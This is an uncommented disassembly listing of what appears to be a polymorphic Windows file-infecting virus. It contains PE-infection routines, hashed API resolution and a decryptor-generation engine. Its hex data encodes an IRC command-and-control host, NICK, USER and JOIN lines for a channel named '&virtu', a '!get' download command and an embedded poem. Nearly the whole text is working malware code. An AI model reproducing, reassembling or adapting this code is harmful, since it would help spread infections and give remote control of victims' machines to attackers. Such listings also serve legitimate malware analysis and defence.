jz short loc_31607D2B
mov ecx, [ebp+401588h]
jecxz short loc_31607CE3
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31607CE3: ; CODE XREF: sub_31607C7F+56�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_31607C48
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_31607C48
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_31607C48
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_31607D2B
lea ecx, [edi+23F5h]
call sub_31607C48
loc_31607D2B: ; CODE XREF: sub_31607C7F+16�j
; sub_31607C7F+4E�j ...
mov eax, edi
pop edi
retn
sub_31607C7F endp
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dw 0E855h
dd 0
dd 43ED815Dh, 6A00401Ah, 0E958DFFh, 5000401Ah, 2420CD52h
dd 83002A00h, 0C7660CC4h, 401A5485h, 0C720CD00h, 401A5685h
dd 2A002400h, 6AC35D00h, 0FF016A01h, 473FF33h, 0C08515FFh
dd 0B68F074h, 8B000000h, 50035BD0h, 72B58D3Ch, 8B00401Ah
dd 10CBAh, 88A8B00h, 3000001h, 60CB2BF8h, 0A6F3CB8Bh, 47057461h
dd 0C2EBF5E2h, 570FC783h, 8B53D48Bh, 6A5450CCh, 6A525140h
dd 0F095FFFFh, 83004035h, 958B0CC4h, 403574h, 0EA83D72Bh
dd 6A07C707h, 8900E800h, 6AC30357h, 9E8581Ah, 8D000000h
dd 0FEAA6142h, 0C3F075C9h
; =============== S U B R O U T I N E =======================================
sub_31607E10 proc near ; CODE XREF: sub_3160867B+1B�p
; sub_316087F3+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_31607E10 endp
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401B09EDh, 4A9D8B00h, 83004036h
dd 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h, 95FF0000h
dd 403590h, 848DFC8Bh, 10424h, 6A5000h, 4E8h, 54525600h
dd 95FF5700h, 40358Ch, 978DC933h, 104h, 26A5151h, 68016A51h
dd 40000000h, 5C95FF52h, 96004035h, 5B74F685h, 4685450h
dd 57000001h, 2024B4FFh, 0FF000002h, 40362895h, 0C0855900h
dd 14E31674h, 6AD48B50h, 57515200h, 0CC95FF56h, 59004035h
dd 0D075C085h, 3C95FF56h, 8D004035h, 57524457h, 8D58446Ah
dd 10497h, 0C033AB00h, 0F359106Ah, 505050ABh, 50505050h
dd 6495FF52h, 81004035h, 208C4h, 2474FF00h, 1895FF08h
dd 53004036h, 361895FFh, 0C25D0040h, 3E800004h, 4601750Ah
dd 15848D8Bh, 19E30040h, 1000958Dh, 0D1030040h, 84D2FF56h
dd 1F880FC0h, 0F000001h, 11084h, 3A3E8000h, 80461075h
dd 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h, 0CF8B4275h
dd 4F0146C6h, 6A51CE2Bh, 53565100h, 361095FFh, 3B590040h
dd 0DF850FC1h, 8D000000h, 401DA285h, 68006A00h, 0Ch, 95FF5350h
dd 403610h, 0C3Dh, 0BF850F00h, 0E9000000h, 0B1h, 52503E81h
dd 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch, 99h, 0F375203Ch
dd 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h, 74656721h, 3CAC7F75h
dd 817C7520h, 6820FF7Eh, 71757474h, 70037E81h, 752F2F3Ah
dd 0FF47C668h, 0BA310F00h, 2710h, 0FF52E2F7h, 4035BC95h
dd 50C03300h, 0E8505050h, 9, 6E776F44h, 64616F6Ch, 2095FF00h
dd 85004036h, 333674C0h, 4A8589C9h, 51004036h, 20068h
dd 56515180h, 2495FF50h, 8D004036h, 401B0395h, 0C9335000h
dd 52505154h, 95FF5151h, 40356Ch, 0FF240487h, 40353C95h
dd 80C3F800h, 4015778Dh, 0C3F90100h, 54464F53h, 45524157h
dd 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h, 435C7377h
dd 65727275h, 6556746Eh, 6F697372h, 78455C6Eh, 726F6C70h
dd 54007265h, 65677261h, 736F4874h, 20074h, 0F0FFh, 72700000h
dd 6D69786Fh, 6372692Eh, 616C6167h, 702E7978h, 494E006Ch
dd 6D204B43h, 73747A72h, 0A717A72h, 52455355h, 32307920h
dd 31303530h, 2E202E20h, 4A2D3A20h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 401DB4h, 157785C6h, 0FF000040h
dd 40359495h, 1FE8C100h, 1E6A3C74h, 3550B58Bh, 0AC590040h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 403640BDh, 2768B00h
dd 0A566A557h, 336A858Dh, 858F0040h, 403390h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 858D43EBh, 4015B1h, 6A006A50h
dd 0A495FF0Eh, 83004035h, 408247Ch, 4E82B75h, 53000000h
dd 0FF004346h, 40358895h, 0FC48E800h, 7E8FFFFh, 53000000h
dd 4F5F4346h, 95FF0053h, 403588h, 0FFFC31E8h, 0F356E8FFh
dd 8DFFFFFFh, 401303h, 0BE8h, 45535500h, 2E323352h, 4C4C44h
dd 359C95FFh, 0AE80040h, 77000000h, 69727073h, 4166746Eh
dd 95FF5000h, 403548h, 35548589h, 310F0040h, 18E08D8Dh
dd 85890040h, 403646h, 9C95FF51h, 93004035h, 468h, 0EDB58D00h
dd 59004018h, 362CBD8Dh, 0D6E80040h, 66FFFFF6h, 1D6785C7h
dd 0F0FF0040h, 1D69A583h, 8D000040h, 401D2795h, 6A545000h
dd 52006A01h, 268h, 3095FF80h, 85004036h, 22755AC0h, 1D5A8D8Dh
dd 6A520040h, 67B58D06h, 5400401Dh, 51505056h, 3495FF52h
dd 58004036h, 362C95FFh, 85C60040h, 40384Dh, 0CE800h, 53570000h
dd 334B434Fh, 4C442E32h, 95FF004Ch, 40359Ch, 76893h, 0B58D0000h
dd 401844h, 0FCBD8D59h, 0E8004035h, 0FFFFF651h, 0CE8h
dd 4E495700h, 54454E49h, 4C4C442Eh, 9C95FF00h, 85004035h
dd 0E7840FC0h, 93000001h, 568h, 82B58D00h, 59004018h, 3618BD8Dh
dd 1AE80040h, 83FFFFF6h, 40361CBDh, 840F0000h, 1C2h, 190EC81h
dd 68540000h, 101h, 35FC95FFh, 0C4810040h, 190h, 6AD48B50h
dd 95FF5200h, 40361Ch, 7559C085h, 1388680Dh, 95FF0000h
dd 4035BCh, 0BD83E2EBh, 401D69h, 8D297500h, 401D6D85h
dd 95FF5000h, 403608h, 840FC085h, 13Bh, 8B0C408Bh, 8F30FF00h
dd 401D6985h, 4D85C600h, 1004038h, 16A006Ah, 95FF026Ah
dd 403614h, 0FFFF883h, 11284h, 958D9300h, 401D65h, 5352106Ah
dd 360495FFh, 0C0850040h, 0F2850Fh, 0BD8D0000h, 401D86h
dd 0BCE808B1h, 68FFFFFAh, 94h, 89E62B5Eh, 0FF542434h, 40359895h
dd 94BD8D00h, 0B100401Dh, 0FA9DE801h, 448BFFFFh, 0E0C11024h
dd 24440B08h, 8E0C104h, 824440Bh, 5E850h, 2E250000h, 57007836h
dd 355495FFh, 0C4830040h, 647C60Ch, 81958D20h, 6A00401Dh
dd 216800h, 53520000h, 361095FFh, 7C8D0040h, 0FF571424h
dd 40355895h, 3804C600h, 6A400Ah, 0FF535750h, 40361095h
dd 8DE60300h, 401DA2BDh, 68006A00h, 0Ch, 95FF5357h, 403610h
dd 0C3Dh, 8D4D7500h, 40364EB5h, 4D8D8D00h, 2B004038h, 51006ACEh
dd 95FF5356h, 40360Ch, 7E00F883h, 0FE8B912Fh, 364EB58Dh
dd 0DB00040h, 1075AEF2h, 0FAF8E860h, 7261FFFFh, 8D09E317h
dd 0EAEB0177h, 0CE2BCF8Bh, 364EBD8Dh, 0A4F30040h, 0B9EBF787h
dd 95FF53h, 80004036h, 401577BDh, 2A740100h, 753068h, 0BC95FF00h
dd 80004035h, 40384DBDh, 11740000h, 1D6985C7h, 40h, 85C60000h
dd 40384Dh, 0FE56E900h, 85C7FFFFh, 401580h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 0D216574h, 0C784040Ah
dd 0A6142930h, 37524810h, 0B1FAE540h, 6CCC5C27h, 0A61413C2h
dd 99AD4710h, 73C17E62h, 0AB59571Ah, 0D479ED3Ah, 6EF96A4Fh
dd 0B8B35260h, 0D8h, 12h dup(0)
dd 68988F00h
db 0C7h
; =============== S U B R O U T I N E =======================================
sub_316085C5 proc near ; CODE XREF: sub_3160860C:loc_31608669�p
; sub_316086CC+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_316085E1: ; CODE XREF: sub_316085C5+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_31608603
cmp eax, [edx+8]
jnb short loc_31608603
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_31608608
; ---------------------------------------------------------------------------
loc_31608603: ; CODE XREF: sub_316085C5+23�j
; sub_316085C5+28�j
add edx, 28h
loop loc_316085E1
loc_31608608: ; CODE XREF: sub_316085C5+3C�j
popa
retn 4
sub_316085C5 endp
; =============== S U B R O U T I N E =======================================
sub_3160860C proc near ; CODE XREF: UPX2:31608938�p
; UPX2:3160895E�p
mov [ebp+4022F7h], al
call sub_3160867B
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_31608623: ; CODE XREF: sub_3160860C+1E�j
cmp [eax], ebx
jz short loc_31608633
add eax, 4
loop loc_31608623
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_31608633: ; CODE XREF: sub_3160860C+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_3160864D
loc_3160863D: ; CODE XREF: sub_3160860C+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3160863D
mov [ebp+402224h], ebx
loc_3160864D: ; CODE XREF: sub_3160860C+2F�j
; sub_3160867B+34�j
cmp dword ptr [edx], 0
jz short loc_31608657
sub esi, [edx]
add esi, [edx+10h]
loc_31608657: ; CODE XREF: sub_3160860C+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_31608666
push dword ptr [edx]
jmp short loc_31608669
; ---------------------------------------------------------------------------
loc_31608666: ; CODE XREF: sub_3160860C+54�j
push dword ptr [edx+10h]
loc_31608669: ; CODE XREF: sub_3160860C+58�j
call sub_316085C5
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_3160860C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3160867B proc near ; CODE XREF: sub_3160860C+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_316086CC
mov eax, [ebp+40398Eh]
call sub_31607E10
call sub_316086B8
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_316086B1
mov [ebp+4022A0h], ebx
jmp short loc_3160864D
; ---------------------------------------------------------------------------
loc_316086B1: ; CODE XREF: sub_3160867B+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_3160867B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_316086B8 proc near ; CODE XREF: sub_3160867B+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_316086CC
xor ecx, ecx
retn
sub_316086B8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_316086CC proc near ; CODE XREF: sub_3160867B+10�p
; sub_316086B8+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_316085C5
add edx, [ebp+4039AAh]
add edx, esi
loc_316086E0: ; CODE XREF: sub_316086CC+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_316087F1
cmp dword ptr [edx+10h], 0
jz locret_316087F1
mov eax, [edx+0Ch]
push eax
call sub_316085C5
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_31608706: ; CODE XREF: sub_316086CC+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_31608726
cmp cl, 2Eh
jz short loc_31608715
loc_31608712: ; CODE XREF: sub_316086CC+58�j
inc eax
jmp short loc_31608706
; ---------------------------------------------------------------------------
loc_31608715: ; CODE XREF: sub_316086CC+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_31608712
loc_31608726: ; CODE XREF: sub_316086CC+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_316087E9
cmp word ptr [eax-2], 3233h
jnz loc_316087E9
push esi
cmp dword ptr [edx], 0
jnz short loc_31608749
mov ecx, [edx+10h]
jmp short loc_3160874B
; ---------------------------------------------------------------------------
loc_31608749: ; CODE XREF: sub_316086CC+76�j
mov ecx, [edx]
loc_3160874B: ; CODE XREF: sub_316086CC+7B�j
add esi, ecx
push ecx
call sub_316085C5
add esi, [ebp+4039AAh]
loc_31608759: ; CODE XREF: sub_316086CC+90�j
; sub_316086CC+117�j
lodsd
test eax, eax
js short loc_31608759
jz loc_316087E8
push dword ptr [ebp+4039AAh]
push eax
call sub_316085C5
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_31608785: ; CODE XREF: sub_316086CC+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3160879C
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_31608785
; ---------------------------------------------------------------------------
loc_3160879C: ; CODE XREF: sub_316086CC+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_316087E2
cmp ebx, 0DB6E45A8h
jz short loc_316087E2
cmp ebx, 0FFA13B59h
jz short loc_316087E2
cmp ebx, 0ACB522D6h
jz short loc_316087E2
cmp ebx, 0F358E993h
jz short loc_316087E2
cmp ebx, 0F358E97Dh
jz short loc_316087E2
cmp ebx, 0E1253F46h
jz short loc_316087E2
cmp ebx, 0E1253F30h
jz short loc_316087E2
call dword ptr [ebp+403992h]
loc_316087E2: ; CODE XREF: sub_316086CC+D6�j
; sub_316086CC+DE�j ...
pop ebx
jmp loc_31608759
; ---------------------------------------------------------------------------
loc_316087E8: ; CODE XREF: sub_316086CC+92�j
pop esi
loc_316087E9: ; CODE XREF: sub_316086CC+60�j
; sub_316086CC+6C�j
add edx, 14h
jmp loc_316086E0
; ---------------------------------------------------------------------------
locret_316087F1: ; CODE XREF: sub_316086CC+18�j
; sub_316086CC+22�j
retn
sub_316086CC endp
; ---------------------------------------------------------------------------
db 2
; =============== S U B R O U T I N E =======================================
sub_316087F3 proc near ; CODE XREF: UPX2:31608931�p
; UPX2:31608957�p
push 4
pop eax
call sub_31607E10
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_31607E10
add edx, 8
xchg edx, ecx
loc_3160881B: ; CODE XREF: sub_316087F3:loc_3160885A�j
push 5
pop eax
call sub_31607E10
cmp dl, 3
jnb short loc_31608833
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_3160885A
; ---------------------------------------------------------------------------
loc_31608833: ; CODE XREF: sub_316087F3+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_31608854
mov al, 11h
call sub_31607E10
mov eax, 1
loc_31608848: ; CODE XREF: sub_316087F3+5D�j
test dl, dl
jz short loc_31608859
shl eax, 1
dec dl
jmp short loc_31608848
; ---------------------------------------------------------------------------
jmp short loc_31608859
; ---------------------------------------------------------------------------
loc_31608854: ; CODE XREF: sub_316087F3+47�j
mov eax, 80000000h
loc_31608859: ; CODE XREF: sub_316087F3+57�j
; sub_316087F3+5F�j
stosd
loc_3160885A: ; CODE XREF: sub_316087F3+3E�j
loop loc_3160881B
retn
sub_316087F3 endp
; ---------------------------------------------------------------------------
loc_3160885D: ; CODE XREF: sub_316092B7+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_31608872
mov al, 60h
stosb
loc_31608872: ; CODE XREF: UPX2:3160886D�j
test dword ptr [ebp+403431h], 1000003h
jz loc_31608978
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EEEA3436h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_316088F0
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_316088BB
mov eax, 2E8B6467h
loc_316088BB: ; CODE XREF: UPX2:316088B4�j
stosd
mov ax, 0
stosw
jz short loc_316088C7
mov al, 5Dh
stosb
loc_316088C7: ; CODE XREF: UPX2:316088C2�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_316088EE
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_316088EE
mov eax, 0F8ED83h
loc_316088EE: ; CODE XREF: UPX2:316088D6�j
; UPX2:316088E7�j
stosd
dec edi
loc_316088F0: ; CODE XREF: UPX2:316088A3�j
test dword ptr [ebp+403431h], 3
jz short loc_31608900
mov al, 0E9h
stosb
stosd
loc_31608900: ; CODE XREF: UPX2:316088FA�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_31608978
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_316087F3
mov al, 20h
call sub_3160860C
jecxz short loc_31608978
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_3160896B
call sub_316087F3
mov al, 1Fh
call sub_3160860C
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_3160896B: ; CODE XREF: UPX2:31608955�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_31608978: ; CODE XREF: UPX2:3160887C�j
; UPX2:31608917�j ...
test dword ptr [ebp+403431h], 4
jz short loc_31608996
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_31608996: ; CODE XREF: UPX2:31608982�j
test dword ptr [ebp+403431h], 8
jnz short loc_316089EC
cmp byte ptr [ebp+40342Fh], 0
jz short loc_316089EC
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_316089EA
mov al, 49h
stosb
mov ax, 0FC75h
loc_316089EA: ; CODE XREF: UPX2:316089E1�j
stosw
loc_316089EC: ; CODE XREF: UPX2:316089A0�j
; UPX2:316089A9�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_31608A0D
mov al, 58h
or al, [ebp+403429h]
stosb
loc_31608A0D: ; CODE XREF: UPX2:31608A02�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_31608A20
add ah, 28h
loc_31608A20: ; CODE XREF: UPX2:31608A1B�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_31608A44
mov al, 50h
add al, [ebp+403429h]
stosb
loc_31608A44: ; CODE XREF: UPX2:31608A39�j
test dword ptr [ebp+403431h], 80h
jnz short loc_31608A5B
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_31608A98
; ---------------------------------------------------------------------------
loc_31608A5B: ; CODE XREF: UPX2:31608A4E�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_31608A6D
mov al, 29h
loc_31608A6D: ; CODE XREF: UPX2:31608A69�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_31608A90
mov ah, 0C8h
loc_31608A90: ; CODE XREF: UPX2:31608A8C�j
or ah, [ebp+40342Ah]
stosw
loc_31608A98: ; CODE XREF: UPX2:31608A59�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_31608B1C
test dword ptr [ebp+403431h], 400h
jnz short loc_31608AC7
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_31608B14
; ---------------------------------------------------------------------------
loc_31608AC7: ; CODE XREF: UPX2:31608ABA�j
test dword ptr [ebp+403431h], 800h
jnz short loc_31608AE4
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_31608AF9
; ---------------------------------------------------------------------------
loc_31608AE4: ; CODE XREF: UPX2:31608AD1�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_31608AF9: ; CODE XREF: UPX2:31608AE2�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_31608B0C
add ah, 8
loc_31608B0C: ; CODE XREF: UPX2:31608B07�j
or ah, [ebp+40342Bh]
stosw
loc_31608B14: ; CODE XREF: UPX2:31608AC5�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_31608B1C: ; CODE XREF: UPX2:31608AAE�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_31608B31
mov al, 50h
add al, [ebp+403429h]
stosb
loc_31608B31: ; CODE XREF: UPX2:31608B26�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_31608B41
add al, 4
loc_31608B41: ; CODE XREF: UPX2:31608B3D�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_31608B5E
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31608B5E: ; CODE XREF: UPX2:31608B55�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_31608B70
mov ah, 29h
loc_31608B70: ; CODE XREF: UPX2:31608B6C�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_31608B8E
mov al, 86h
loc_31608B8E: ; CODE XREF: UPX2:31608B8A�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_31608BA2
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31608BA2: ; CODE XREF: UPX2:31608B99�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_31608BB9
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_31608BC8
; ---------------------------------------------------------------------------
loc_31608BB9: ; CODE XREF: UPX2:31608BAC�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_31608BC8: ; CODE XREF: UPX2:31608BB7�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_31608C03
test dword ptr [ebp+403431h], 40000h
jnz short loc_31608BFA
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31608C02
; ---------------------------------------------------------------------------
loc_31608BFA: ; CODE XREF: UPX2:31608BDE�j
mov al, 40h
or al, [ebp+40342Bh]
loc_31608C02: ; CODE XREF: UPX2:31608BF8�j
stosb
loc_31608C03: ; CODE XREF: UPX2:31608BD2�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_31608C1F
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_31608C27
; ---------------------------------------------------------------------------
loc_31608C1F: ; CODE XREF: UPX2:31608C0D�j
mov al, 48h
or al, [ebp+40342Ah]
loc_31608C27: ; CODE XREF: UPX2:31608C1D�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_31608C5B
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_31608C76
mov cl, 77h
jmp short loc_31608C76
; ---------------------------------------------------------------------------
loc_31608C5B: ; CODE XREF: UPX2:31608C34�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_31608C76: ; CODE XREF: UPX2:31608C55�j
; UPX2:31608C59�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_31608D20
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_31608CB7
mov eax, 2E876467h
loc_31608CB7: ; CODE XREF: UPX2:31608CB0�j
stosd
mov eax, 0
stosw
jnz short loc_31608CC7
mov ax, 0E58Bh
stosw
loc_31608CC7: ; CODE XREF: UPX2:31608CBF�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_31608D1D
test dword ptr [ebp+403431h], 8000000h
jz short loc_31608D0F
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_31608D0A
mov ax, 424h
stosw
jmp short loc_31608D1D
; ---------------------------------------------------------------------------
loc_31608D0A: ; CODE XREF: UPX2:31608D00�j
mov al, 8
stosb
jmp short loc_31608D1D
; ---------------------------------------------------------------------------
loc_31608D0F: ; CODE XREF: UPX2:31608CE7�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_31608D20
; ---------------------------------------------------------------------------
loc_31608D1D: ; CODE XREF: UPX2:31608CDB�j
; UPX2:31608D08�j ...
mov al, 0C9h
stosb
loc_31608D20: ; CODE XREF: UPX2:31608C93�j
; UPX2:31608D1B�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31608D4C
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_31608D4C: ; CODE XREF: UPX2:31608D2A�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_31608DB7
test dword ptr [ebp+403431h], 20000000h
jz short loc_31608D7D
loc_31608D70: ; CODE XREF: UPX2:31608D7B�j
test edi, 3
jz short loc_31608D7D
mov al, 90h
stosb
jmp short loc_31608D70
; ---------------------------------------------------------------------------
loc_31608D7D: ; CODE XREF: UPX2:31608D6E�j
; UPX2:31608D76�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_31608DAB
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_31608DB5
; ---------------------------------------------------------------------------
loc_31608DAB: ; CODE XREF: UPX2:31608D9D�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_31608DB5: ; CODE XREF: UPX2:31608DA9�j
stosw
loc_31608DB7: ; CODE XREF: UPX2:31608D62�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_31608E36
test dword ptr [ebp+403431h], 20000000h
jz short loc_31608DDC
loc_31608DCF: ; CODE XREF: UPX2:31608DDA�j
test edi, 3
jz short loc_31608DDC
mov al, 90h
stosb
jmp short loc_31608DCF
; ---------------------------------------------------------------------------
loc_31608DDC: ; CODE XREF: UPX2:31608DCD�j
; UPX2:31608DD5�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_31608E05
lea eax, [ebp+403429h]
loc_31608DFD: ; CODE XREF: UPX2:31608E03�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31608DFD
loc_31608E05: ; CODE XREF: UPX2:31608DF5�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
